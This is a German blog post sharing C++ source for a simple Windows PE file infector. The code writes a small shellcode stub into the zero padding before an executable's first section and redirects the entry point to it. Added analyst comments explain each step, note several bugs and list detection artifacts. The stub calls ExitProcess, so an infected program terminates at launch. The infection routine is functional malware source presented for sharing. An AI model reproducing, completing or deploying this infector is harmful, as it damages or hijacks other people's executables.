Freitag, 15. April 2011

[C++] PE Infector

HeyHo,
Krame grade ein bisschen in meinen alten HDDs rum & hab' unter anderem meinen, jetzt leider schon heuristisch detected, PE Infector gefunden.


/* Simple Pe Infector By fred (c)
   infecting method:
   find a free space in pe header;
   how it works?
   we find PointerToRawData of .text section because the system loader puts it first 
   then we use my simple formulation :
   delta = PointerToRawData - sizeof(code) and scan this space of memory; if it's free, infect the file and 
   change OEP to delta.
   may be it will be more correct to use 
   delta = PointerToRawData - (sizeof(code) + some more) 

*/
/* image presentation
   ------------------
   |  PE HEADER     |
   |________________|
   |                |
   |                |
   |  OBJECT TABLE  |
   |________________|                
   |                |
   |                |
   | FREE SPACE     |          
   | our code       |
   |________________|
   |                |
   |.text section   |
   | next section   |
   | next section   |
   | .............. |
   |                |
   ------------------
*/
#include<windows.h>
#include<stdio.h>
/* Returns the PointerToRawData of the section header whose Name compares
   equal (case-insensitively) to ".text", or 0 when no such header is found.
   NOTE(review): the loop body changes neither pSectionHeader nor
   NumberOfSections, so only the first section header is ever compared, and
   the loop does not terminate when that header is not ".text". */
unsigned long GetTextSectionOffset(PIMAGE_SECTION_HEADER pSectionHeader , int NumberOfSections)
{
 while(NumberOfSections > 0)
 {
  /* Name is an 8-byte field that need not be NUL-terminated; strcmpi
     reads it as a C string. */
  if( !strcmpi((char*)pSectionHeader->Name , ".text"))
  {
   return pSectionHeader->PointerToRawData;
  }
 }
 /* we did not find .text section */
 return 0;
}
/* entry point */
int main(int argc , char *argv[])
{
 /* Analyst summary of what this sample does to the file named by argv[1]:
    1. opens the target read/write and maps the whole file read/write;
    2. locates the NT headers via e_lfanew and the first section header;
    3. takes the PointerToRawData of the ".text" header and computes
       delta = PointerToRawData - sizeof(code), a file offset just before
       the first section's raw data (normally zero header padding);
    4. requires every byte in [delta, delta + sizeof(code)) to be zero;
    5. patches the address of ExitProcess, resolved in the infector's own
       process, into the mov eax imm32, writes the stub at delta and sets
       AddressOfEntryPoint = delta (a file offset used as an RVA; presumably
       relies on header offsets equalling RVAs - confirm).
    The stub is push 0 / mov eax,addr / call eax, i.e. ExitProcess(0): the
    original entry point is printed but not preserved, so an infected file
    terminates at start-up. Detection-relevant artifacts: an entry point
    below the first section's raw data offset and non-zero bytes in the
    header padding. sizeof(code) includes the string literal's terminating
    NUL, so 10 bytes are checked and written, not 9. */
 HANDLE hFile;
 HANDLE hMap;
 char *MappedFile = 0;
 DWORD FileSize; /* file size */
 DWORD delta;   /* file offset where the stub is written; becomes the new entry point */
 DWORD SectionOffset; /* .text section offset*/
 DWORD func_addr; /* address of ExitProcess in this process */
 IMAGE_DOS_HEADER *pDosHeader;
 IMAGE_NT_HEADERS *pNtHeader;
 IMAGE_SECTION_HEADER *pSecHeader;
 /* shell code*/
 char code[] = "\x6A\x00"              /*push 0 */
            "\xB8\x00\x00\x00\x00"  /*mov eax , func_addr (address will be inserted automaticly)*/
            "\xFF\xD0";             /*call eax */
 if(argc < 2)
 {
  printf("parameters : ssv.exe [filename] \n");
  printf("simple pe infector by _antony \n");
  return 0;
 }
 printf("target: [%s] \n" , argv[1]);
 /* open file */
 hFile = CreateFile(argv[1] , 
                 GENERIC_WRITE | GENERIC_READ ,
        0 ,
        0 ,
        OPEN_EXISTING ,
        FILE_ATTRIBUTE_NORMAL ,
        0);
 if(hFile == INVALID_HANDLE_VALUE)
 {
  printf("[Error]: Can't open File! Error code : %d" , GetLastError());
  return -1;
 }
 /* get file size */
 FileSize = GetFileSize(hFile , 0 );
 printf("[File Size ]: %d \n", FileSize);
 /* mapping file: the whole file is mapped writable, so header edits below
    land directly in the file on disk */
 hMap = CreateFileMapping(hFile ,
                       0 ,
        PAGE_READWRITE ,
        0 , 
        FileSize ,
        0);
 if(hMap == INVALID_HANDLE_VALUE)
 {
  printf("[Error]: Can't map file! Error code: %d\n" , GetLastError());
  CloseHandle(hFile);
  return -1;
 }
 MappedFile = (char*)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , FileSize);
 if(MappedFile == NULL)
 {
  printf("[Error]: Can't map file! Error code %d\n", GetLastError());
  CloseHandle(hFile);
  CloseHandle(hMap);
  UnmapViewOfFile(MappedFile);
  return -1;
 }
 /* walk DOS header -> NT headers -> section table; no bounds or signature
    checks are performed on e_lfanew or the headers */
 pDosHeader = (IMAGE_DOS_HEADER*)MappedFile;
 pNtHeader  = (IMAGE_NT_HEADERS*)((DWORD)MappedFile + pDosHeader->e_lfanew);
 pSecHeader = IMAGE_FIRST_SECTION(pNtHeader);
    /* get .text section PointerToRawData*/
 SectionOffset = GetTextSectionOffset(pSecHeader , pNtHeader->FileHeader.NumberOfSections);
 if(SectionOffset == 0)
 {
  printf("[Error]: Can't find .text section!\n");
  CloseHandle(hFile);
  CloseHandle(hMap);
  UnmapViewOfFile(MappedFile);
  return -1;
 }
 /* stub is placed in the sizeof(code) bytes immediately preceding the
    first section's raw data */
 delta = SectionOffset - sizeof(code);
 int i;
 BYTE check;
 printf("scanning...\n");
 /* scanning space  if there are only 00 then we infect file */
 for(i=0 ; i<sizeof(code) ; i++)
 {
      check = *((BYTE*)MappedFile + delta + i);
   printf("%X \t", check);
   if(check != 0)
   {
    printf("There is some data...\n");
    CloseHandle(hFile);
    CloseHandle(hMap);
    UnmapViewOfFile(MappedFile);
    return -1;
   }
 }
   printf("Space if free , infecting File...\n");
   /* insert function address in shell code: the address is whatever
      GetProcAddress returns in the infector's own process */
   func_addr = (DWORD)GetProcAddress( LoadLibrary("kernel32.dll") , "ExitProcess");
   /* locate the mov eax opcode (0xB8 followed by three zero bytes) and
      overwrite its imm32. NOTE(review): a 4-byte read is done at every i,
      so the last three iterations read past the end of code[] (UB in C). */
   for(i=0 ; i < sizeof(code) ; i++ )
   {
    if( *(DWORD*)&code[i] == 0x00000B8)
    {
     *(DWORD*)(code+i+1)= func_addr;
    }
   }
   printf("Old Entry Point : %08X \n" , pNtHeader->OptionalHeader.AddressOfEntryPoint);
   memcpy(MappedFile+delta , code , sizeof(code));
   /* new entry point: the old value is only printed above, not saved */
   pNtHeader->OptionalHeader.AddressOfEntryPoint = delta;
          printf("File infected!\n");
   printf("New Entry Point: %08X \n" , delta);
   CloseHandle(hFile);
   CloseHandle(hMap);
   UnmapViewOfFile(MappedFile);
   return 0;
}

Großes Danke an meine damaligen c++ Leute ;-)


~fred

